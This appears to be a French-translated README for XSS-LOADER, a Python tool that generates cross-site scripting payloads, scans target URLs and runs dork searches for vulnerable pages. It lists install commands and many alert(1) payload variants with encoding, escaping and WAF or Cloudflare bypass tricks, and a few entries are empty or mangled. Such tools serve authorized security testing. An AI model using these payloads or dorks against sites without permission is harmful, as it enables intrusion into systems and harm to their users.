
Générateur de Payload Xss ~ Scanner Xss ~ Dork Finder Xss

Tout-en-un pour GÉNÉRATEUR DE PAYLOAD XSS - SCANNER XSS - TROUVEUR DE DORK XSS
Instagram: TMRSWRR

git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt
python3 payloader.py
Définit le paramètre par défaut à :<script>alert(1)</script>
Définit le paramètre par défaut à :<div onpointerover='alert(1)'>MOVE HERE</div
Définit le paramètre par défaut à :``````
Définit le paramètre par défaut à :<body ontouchstart=alert(1)>
Définit le paramètre par défaut à :<svg onload=alert('1')>
Encode le payload écrit par l'utilisateur
Encode le payload sur le tag sélectionné
* | 1. MAJUSCULE----> <SCRIPT>ALERT(1)</SCRIPT>
* | 2. MAJUSCULE ET MINUSCULE----> <ScRiPt>aleRt(1)</ScRiPt>
* | 3. ENCODAGE URL -----> %3Cscript%3Ealert%281%29%3C%2Fscript%3E
* | 4. ENCODAGE ENTITÉ HTML-----> <script>alert(1)</script>
* | 5. PAYLOAD SPLITÉ -----> <scri</script>pt>>alert(1)</scri</script>pt>>
* | 6. ENCODAGE HEX -----> 3c7363726970743e616c6572742831293c2f7363726970743e
* | 7. ENCODAGE UTF-16 -----> Encode payload to utf-16 format.
* | 8. ENCODAGE UTF-32-----> Encode payload to utf-32 format.
* | 9. SUPPRIMER TAG -----> ";alert('XSS');//
* | 10. ENCODAGE UNICODE-----> %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
* | 11. ENCODAGE US-ASCII -----> ¼script¾alert(1)¼/script¾
* | 12. ENCODAGE BASE64 -----> PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
* | 13. ENCODAGE UTF-7 -----> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
* | 14. BYPASS PAR PARENTHÈSES -----> <script>alert`1`</script>
* | 15. ENCODAGE UTF-8 -----> %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE
* | 16. ÉVASION DE BLOC TAG-----> "><script>alert(1)</script>
* | 17. ÉVASION DE SCRIPT-----> </script><script>alert(1)</script>
* | 18. PAYLOAD DE TÉLÉCHARGEMENT DE FICHIER-----> "><script>alert(1)</script>.gif
* | 19. BYPASS DANS LES COMMENTAIRES-----> <!--><script>alert(1)</script>-->
* | 20. PAYLOAD DE MUTATION-----> <noscript><p title="</noscript><script>alert(1)</script>">
* | 21. IMG MALFORMÉE-----> <script>alert(1)</script>">
* | 22. BYPASS PAR ESPACE----->
* | 23. BLOC DOWNLEVEL-HIDDEN-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* | 24. PAYLOADS DE BYPASS WAF-----> Show Waf Bypass Payload List
* | 25. PAYLOADS DE BYPASS CLOUDFLARE-----> Show Cloudflare Bypass Payload List
* | 26. PAYLOADS POLYGLOT-----> Show Polyglot Bypass Payload List
* | 27. PAYLOADS ALERT-----> Show Alert Payload List
* | 28. CRÉER TOUS LES PAYLOADS-----> Show Create All Payloads
* | 29. RETOUR AU MENU PRINCIPAL
* | 30. QUITTER
Initialement, vous devrez entrer l'URL de la cible Veuillez entrer l'URL comme cet exemple==>p.ex. cible -----> http://target.com/index.php?name= Sélectionné pour la liste de payloads à scanner
Les résultats seront ajoutés dans "vulnpayload.txt" après le scan.
Entrez d'abord le dork pour la recherche: p.ex.---->inurl:"search.php?q=" Les résultats seront enregistrés dans "dork.txt" après le scan.
Erreurs Unicode
Erreurs de module
Important :
Si vous souhaitez utiliser l'outil pour python3 installé sur Windows, téléchargez le lien ci-dessous :
https://github.com/capture0x/XSS-LOADER-for-WINDOWS
Pour les rapports de bogues ou les améliorations, veuillez ouvrir une issue ici.
Copyright 2020